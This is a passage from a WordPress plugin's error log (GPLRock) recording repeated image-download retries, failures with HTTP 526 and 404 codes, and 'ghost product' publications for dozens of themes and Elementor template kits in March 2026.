stoni-architecture-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:37:59 UTC] GPLRock: Image download failed for product latepoint-appointment-booking-reservation-plugin-for-wordpress (attempt 2/3). HTTP Code: 404, Error: . Retrying... [28-Mar-2026 01:38:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stoni---architecture-agency-wordpress-theme-4636.webp for product stoni-architecture-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 01:38:01 UTC] GPLRock WARNING: Image download failed for product stoni-architecture-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/stoni---architecture-agency-wordpress-theme-4636.webp [28-Mar-2026 01:38:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stoni-architecture-agency-wordpress-theme [28-Mar-2026 01:38:02 UTC] GPLRock: Image download failed for product bronx-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:38:03 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/07/LatePoint-Appointment-Booking-Reservation-plugin-for-WordPress.jpg for product latepoint-appointment-booking-reservation-plugin-for-wordpress after 3 attempts. HTTP Code: 404, Error: [28-Mar-2026 01:38:03 UTC] GPLRock WARNING: Image download failed for product latepoint-appointment-booking-reservation-plugin-for-wordpress. URL: https://www.gplrock.com/wp-content/uploads/2021/07/LatePoint-Appointment-Booking-Reservation-plugin-for-WordPress.jpg [28-Mar-2026 01:38:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: latepoint-appointment-booking-reservation-plugin-for-wordpress [28-Mar-2026 01:38:04 UTC] GPLRock: Image download failed for product bronx-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:38:05 UTC] GPLRock: Image download failed for product adifier-classified-ads-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [28-Mar-2026 01:38:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bronx--portfolio-wordpress-theme-13868.webp for product bronx-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 01:38:07 UTC] GPLRock: Image download failed for product bronx-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:38:09 UTC] GPLRock: Image download failed for product adifier-classified-ads-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [28-Mar-2026 01:38:09 UTC] GPLRock: Image download failed for product bronx-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:38:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bronx--portfolio-wordpress-theme-13868.webp for product bronx-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 01:38:11 UTC] GPLRock WARNING: Image download failed for product bronx-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bronx--portfolio-wordpress-theme-13868.webp [28-Mar-2026 01:38:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bronx-portfolio-wordpress-theme [28-Mar-2026 01:38:12 UTC] GPLRock: Image download failed for product nanotech-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:38:12 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/07/Adifier-Classified-Ads-WordPress-Theme_.jpg for product adifier-classified-ads-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [28-Mar-2026 01:38:13 UTC] GPLRock: Image download failed for product adifier-classified-ads-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [28-Mar-2026 01:38:14 UTC] GPLRock: Image download failed for product nanotech-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:38:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nanotech---creative-portfolio-wordpress-theme-26964.webp for product nanotech-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 01:38:17 UTC] GPLRock: Image download failed for product adifier-classified-ads-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [28-Mar-2026 01:38:17 UTC] GPLRock: Image download failed for product nanotech-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:38:19 UTC] GPLRock: Image download failed for product nanotech-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:38:20 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/07/Adifier-Classified-Ads-WordPress-Theme_.jpg for product adifier-classified-ads-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [28-Mar-2026 01:38:20 UTC] GPLRock WARNING: Image download failed for product adifier-classified-ads-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/07/Adifier-Classified-Ads-WordPress-Theme_.jpg [28-Mar-2026 01:38:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adifier-classified-ads-wordpress-theme [28-Mar-2026 01:38:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nanotech---creative-portfolio-wordpress-theme-26964.webp for product nanotech-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 01:38:21 UTC] GPLRock WARNING: Image download failed for product nanotech-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nanotech---creative-portfolio-wordpress-theme-26964.webp [28-Mar-2026 01:38:22 UTC] GPLRock: Image downloaded successfully for product wp-fastest-cache-wordpress-plugin-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b649ed18.png [28-Mar-2026 01:38:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nanotech-creative-portfolio-wordpress-theme [28-Mar-2026 01:38:23 UTC] GPLRock: Using pre-downloaded image for product wp-fastest-cache-wordpress-plugin-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b649ed18.png [28-Mar-2026 01:38:23 UTC] GPLRock: Ghost product published with image - Product ID: wp-fastest-cache-wordpress-plugin-premium [28-Mar-2026 01:38:25 UTC] GPLRock: Image download failed for product our-mission-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 01:38:28 UTC] GPLRock: Image download failed for product our-mission-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:10:19 UTC] GPLRock: Image downloaded successfully for product consulz-consulting-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-885afacd.webp [28-Mar-2026 04:10:19 UTC] GPLRock: Using pre-downloaded image for product consulz-consulting-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-885afacd.webp [28-Mar-2026 04:10:19 UTC] GPLRock: Ghost product published with image - Product ID: consulz-consulting-company-elementor-template-kit [28-Mar-2026 04:10:20 UTC] GPLRock: Image downloaded successfully for product consulty-finance-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1ba8ac16.webp [28-Mar-2026 04:10:20 UTC] GPLRock: Using pre-downloaded image for product consulty-finance-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1ba8ac16.webp [28-Mar-2026 04:10:20 UTC] GPLRock: Ghost product published with image - Product ID: consulty-finance-consulting-elementor-template-kit [28-Mar-2026 04:10:21 UTC] GPLRock: Image downloaded successfully for product consultants-lawyer-attorney-elementor-template-kits (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-270da1d9.webp [28-Mar-2026 04:10:22 UTC] GPLRock: Using pre-downloaded image for product consultants-lawyer-attorney-elementor-template-kits: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-270da1d9.webp [28-Mar-2026 04:10:22 UTC] GPLRock: Ghost product published with image - Product ID: consultants-lawyer-attorney-elementor-template-kits [28-Mar-2026 04:10:23 UTC] GPLRock: Image downloaded successfully for product constructa-building-construction-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c8ecde00.webp [28-Mar-2026 04:10:23 UTC] GPLRock: Using pre-downloaded image for product constructa-building-construction-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c8ecde00.webp [28-Mar-2026 04:10:23 UTC] GPLRock: Ghost product published with image - Product ID: constructa-building-construction-elementor-template-kit [28-Mar-2026 04:10:24 UTC] GPLRock: Image downloaded successfully for product consilt-business-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66693794.webp [28-Mar-2026 04:10:24 UTC] GPLRock: Using pre-downloaded image for product consilt-business-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66693794.webp [28-Mar-2026 04:10:24 UTC] GPLRock: Ghost product published with image - Product ID: consilt-business-consulting-elementor-template-kit [28-Mar-2026 04:10:25 UTC] GPLRock: Image downloaded successfully for product conset-business-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-264fd1fb.jpg [28-Mar-2026 04:10:27 UTC] GPLRock: Using pre-downloaded image for product conset-business-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-264fd1fb.jpg [28-Mar-2026 04:10:27 UTC] GPLRock: Ghost product published with image - Product ID: conset-business-consulting-elementor-template-kit [28-Mar-2026 04:10:28 UTC] GPLRock: Image downloaded successfully for product consession-conference-seminar-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd4dbc8a.webp [28-Mar-2026 04:10:28 UTC] GPLRock: Using pre-downloaded image for product consession-conference-seminar-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd4dbc8a.webp [28-Mar-2026 04:10:28 UTC] GPLRock: Ghost product published with image - Product ID: consession-conference-seminar-elementor-template-kit [28-Mar-2026 04:10:30 UTC] GPLRock: Image downloaded successfully for product conpress-construction-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-457cc89d.webp [28-Mar-2026 04:10:30 UTC] GPLRock: Using pre-downloaded image for product conpress-construction-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-457cc89d.webp [28-Mar-2026 04:10:30 UTC] GPLRock: Ghost product published with image - Product ID: conpress-construction-service-elementor-template-kit [28-Mar-2026 04:10:31 UTC] GPLRock: Image downloaded successfully for product confrico-event-conference-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c850928e.webp [28-Mar-2026 04:10:31 UTC] GPLRock: Using pre-downloaded image for product confrico-event-conference-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c850928e.webp [28-Mar-2026 04:10:31 UTC] GPLRock: Ghost product published with image - Product ID: confrico-event-conference-elementor-template-kit [28-Mar-2026 04:10:32 UTC] GPLRock: Image downloaded successfully for product conder-doors-windows-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c124b2b7.webp [28-Mar-2026 04:10:33 UTC] GPLRock: Using pre-downloaded image for product conder-doors-windows-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c124b2b7.webp [28-Mar-2026 04:10:33 UTC] GPLRock: Ghost product published with image - Product ID: conder-doors-windows-service-elementor-template-kit [28-Mar-2026 04:10:38 UTC] GPLRock: Image download failed for product baby-kids-store-ecommerce-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:10:40 UTC] GPLRock: Image download failed for product baby-kids-store-ecommerce-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:10:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/baby--kids-store-ecommerce-woocommerce-wordpress-theme-9691.webp for product baby-kids-store-ecommerce-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:10:43 UTC] GPLRock: Image download failed for product baby-kids-store-ecommerce-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:10:45 UTC] GPLRock: Image download failed for product baby-kids-store-ecommerce-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:10:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/baby--kids-store-ecommerce-woocommerce-wordpress-theme-9691.webp for product baby-kids-store-ecommerce-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:10:47 UTC] GPLRock WARNING: Image download failed for product baby-kids-store-ecommerce-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/baby--kids-store-ecommerce-woocommerce-wordpress-theme-9691.webp [28-Mar-2026 04:10:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: baby-kids-store-ecommerce-woocommerce-wordpress-theme [28-Mar-2026 04:10:52 UTC] GPLRock: Image download failed for product sosso-agriculture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:10:54 UTC] GPLRock: Image download failed for product sosso-agriculture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:10:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sosso---agriculture-wordpress-theme-18064.webp for product sosso-agriculture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:10:57 UTC] GPLRock: Image download failed for product sosso-agriculture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:10:59 UTC] GPLRock: Image download failed for product sosso-agriculture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sosso---agriculture-wordpress-theme-18064.webp for product sosso-agriculture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:11:01 UTC] GPLRock WARNING: Image download failed for product sosso-agriculture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sosso---agriculture-wordpress-theme-18064.webp [28-Mar-2026 04:11:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sosso-agriculture-wordpress-theme [28-Mar-2026 04:11:09 UTC] GPLRock: Image download failed for product baumeister-wordpress-theme-for-industry-and-manufacturing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:11 UTC] GPLRock: Image download failed for product baumeister-wordpress-theme-for-industry-and-manufacturing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/baumeister---wordpress-theme-for-industry-and-manufacturing-24091.webp for product baumeister-wordpress-theme-for-industry-and-manufacturing after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:11:13 UTC] GPLRock: Image download failed for product baumeister-wordpress-theme-for-industry-and-manufacturing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:15 UTC] GPLRock: Image download failed for product baumeister-wordpress-theme-for-industry-and-manufacturing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/baumeister---wordpress-theme-for-industry-and-manufacturing-24091.webp for product baumeister-wordpress-theme-for-industry-and-manufacturing after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:11:18 UTC] GPLRock WARNING: Image download failed for product baumeister-wordpress-theme-for-industry-and-manufacturing. URL: https://meldwp.com/wp-content/uploads/baumeister---wordpress-theme-for-industry-and-manufacturing-24091.webp [28-Mar-2026 04:11:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: baumeister-wordpress-theme-for-industry-and-manufacturing [28-Mar-2026 04:11:19 UTC] GPLRock: Image download failed for product buildmax-renovation-painting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:21 UTC] GPLRock: Image download failed for product buildmax-renovation-painting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/buildmax---renovation--painting-wordpress-theme-4714.webp for product buildmax-renovation-painting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:11:23 UTC] GPLRock: Image download failed for product buildmax-renovation-painting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:25 UTC] GPLRock: Image download failed for product buildmax-renovation-painting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/buildmax---renovation--painting-wordpress-theme-4714.webp for product buildmax-renovation-painting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:11:27 UTC] GPLRock WARNING: Image download failed for product buildmax-renovation-painting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/buildmax---renovation--painting-wordpress-theme-4714.webp [28-Mar-2026 04:11:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: buildmax-renovation-painting-wordpress-theme [28-Mar-2026 04:11:28 UTC] GPLRock: Image download failed for product toptech-seo-marketing-agency-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:30 UTC] GPLRock: Image download failed for product toptech-seo-marketing-agency-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/toptech---seo-marketing-agency--technology-wordpress-theme-406.webp for product toptech-seo-marketing-agency-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:11:35 UTC] GPLRock: Image download failed for product toptech-seo-marketing-agency-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:37 UTC] GPLRock: Image download failed for product toptech-seo-marketing-agency-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/toptech---seo-marketing-agency--technology-wordpress-theme-406.webp for product toptech-seo-marketing-agency-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:11:39 UTC] GPLRock WARNING: Image download failed for product toptech-seo-marketing-agency-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/toptech---seo-marketing-agency--technology-wordpress-theme-406.webp [28-Mar-2026 04:11:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: toptech-seo-marketing-agency-technology-wordpress-theme [28-Mar-2026 04:11:40 UTC] GPLRock: Image download failed for product dronza-drone-aerial-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:42 UTC] GPLRock: Image download failed for product dronza-drone-aerial-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dronza--drone-aerial-photography-wordpress-theme-28162.webp for product dronza-drone-aerial-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:11:44 UTC] GPLRock: Image download failed for product dronza-drone-aerial-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:46 UTC] GPLRock: Image download failed for product dronza-drone-aerial-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dronza--drone-aerial-photography-wordpress-theme-28162.webp for product dronza-drone-aerial-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:11:48 UTC] GPLRock WARNING: Image download failed for product dronza-drone-aerial-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dronza--drone-aerial-photography-wordpress-theme-28162.webp [28-Mar-2026 04:11:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dronza-drone-aerial-photography-wordpress-theme [28-Mar-2026 04:11:54 UTC] GPLRock: Image download failed for product shard-multipurpose-business-parallax-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:56 UTC] GPLRock: Image download failed for product shard-multipurpose-business-parallax-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:11:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shard---multipurpose-business-parallax-wp-theme-11921.webp for product shard-multipurpose-business-parallax-wp-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:11:58 UTC] GPLRock: Image download failed for product shard-multipurpose-business-parallax-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:12:00 UTC] GPLRock: Image download failed for product shard-multipurpose-business-parallax-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:12:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shard---multipurpose-business-parallax-wp-theme-11921.webp for product shard-multipurpose-business-parallax-wp-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:12:02 UTC] GPLRock WARNING: Image download failed for product shard-multipurpose-business-parallax-wp-theme. URL: https://meldwp.com/wp-content/uploads/shard---multipurpose-business-parallax-wp-theme-11921.webp [28-Mar-2026 04:12:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shard-multipurpose-business-parallax-wp-theme [28-Mar-2026 04:12:05 UTC] GPLRock: Image downloaded successfully for product mudrace-a-single-event-fundraiser-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1ef52523.webp [28-Mar-2026 04:12:06 UTC] GPLRock: Using pre-downloaded image for product mudrace-a-single-event-fundraiser-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1ef52523.webp [28-Mar-2026 04:12:06 UTC] GPLRock: Ghost product published with image - Product ID: mudrace-a-single-event-fundraiser-wordpress-theme [28-Mar-2026 04:12:06 UTC] GPLRock: Image download failed for product tada-blog-personal-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:12:09 UTC] GPLRock: Image download failed for product tada-blog-personal-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:12:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tada--blog---personal-wordpress-theme-13163.webp for product tada-blog-personal-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:12:11 UTC] GPLRock: Image download failed for product tada-blog-personal-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:12:13 UTC] GPLRock: Image download failed for product tada-blog-personal-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:12:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tada--blog---personal-wordpress-theme-13163.webp for product tada-blog-personal-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:12:15 UTC] GPLRock WARNING: Image download failed for product tada-blog-personal-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tada--blog---personal-wordpress-theme-13163.webp [28-Mar-2026 04:12:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tada-blog-personal-wordpress-theme [28-Mar-2026 04:12:16 UTC] GPLRock: Image download failed for product warren-life-and-business-coach-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:12:18 UTC] GPLRock: Image download failed for product warren-life-and-business-coach-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:12:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/warren---life-and-business-coach-wordpress-theme-17704.webp for product warren-life-and-business-coach-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:12:20 UTC] GPLRock: Image download failed for product warren-life-and-business-coach-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:12:22 UTC] GPLRock: Image download failed for product warren-life-and-business-coach-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [28-Mar-2026 04:12:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/warren---life-and-business-coach-wordpress-theme-17704.webp for product warren-life-and-business-coach-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [28-Mar-2026 04:12:25 UTC] GPLRock WARNING: Image download failed for product warren-life-and-business-coach-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/warren---life-and-business-coach-wordpress-theme-17704.webp [28-Mar-2026 04:12:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: warren-life-and-business-coach-wordpress-theme [29-Mar-2026 01:38:43 UTC] GPLRock: Image downloaded successfully for product uplift-charity-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-61f76f19.webp [29-Mar-2026 01:38:43 UTC] GPLRock: Using pre-downloaded image for product uplift-charity-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-61f76f19.webp [29-Mar-2026 01:38:43 UTC] GPLRock: Ghost product published with image - Product ID: uplift-charity-template-kit [29-Mar-2026 01:38:46 UTC] GPLRock: Image downloaded successfully for product upgreat-business-service-corporate-elementor-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-658cf183.webp [29-Mar-2026 01:38:47 UTC] GPLRock: Using pre-downloaded image for product upgreat-business-service-corporate-elementor-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-658cf183.webp [29-Mar-2026 01:38:47 UTC] GPLRock: Ghost product published with image - Product ID: upgreat-business-service-corporate-elementor-template [29-Mar-2026 01:38:50 UTC] GPLRock: Image downloaded successfully for product unniq-dark-digital-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd4d5631.webp [29-Mar-2026 01:38:50 UTC] GPLRock: Using pre-downloaded image for product unniq-dark-digital-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd4d5631.webp [29-Mar-2026 01:38:50 UTC] GPLRock: Ghost product published with image - Product ID: unniq-dark-digital-creative-agency-elementor-template-kit [29-Mar-2026 01:38:51 UTC] GPLRock: Image downloaded successfully for product unleash-life-coach-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42e3285b.webp [29-Mar-2026 01:38:51 UTC] GPLRock: Using pre-downloaded image for product unleash-life-coach-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42e3285b.webp [29-Mar-2026 01:38:51 UTC] GPLRock: Ghost product published with image - Product ID: unleash-life-coach-elementor-template-kit [29-Mar-2026 01:38:53 UTC] GPLRock: Image downloaded successfully for product uneet-apartment-single-property-real-estate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-407f3dc0.jpg [29-Mar-2026 01:38:53 UTC] GPLRock: Using pre-downloaded image for product uneet-apartment-single-property-real-estate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-407f3dc0.jpg [29-Mar-2026 01:38:53 UTC] GPLRock: Ghost product published with image - Product ID: uneet-apartment-single-property-real-estate-elementor-template-kit [29-Mar-2026 01:38:58 UTC] GPLRock: Image downloaded successfully for product undertone-business-services-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93cce3a1.webp [29-Mar-2026 01:38:58 UTC] GPLRock: Using pre-downloaded image for product undertone-business-services-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93cce3a1.webp [29-Mar-2026 01:38:58 UTC] GPLRock: Ghost product published with image - Product 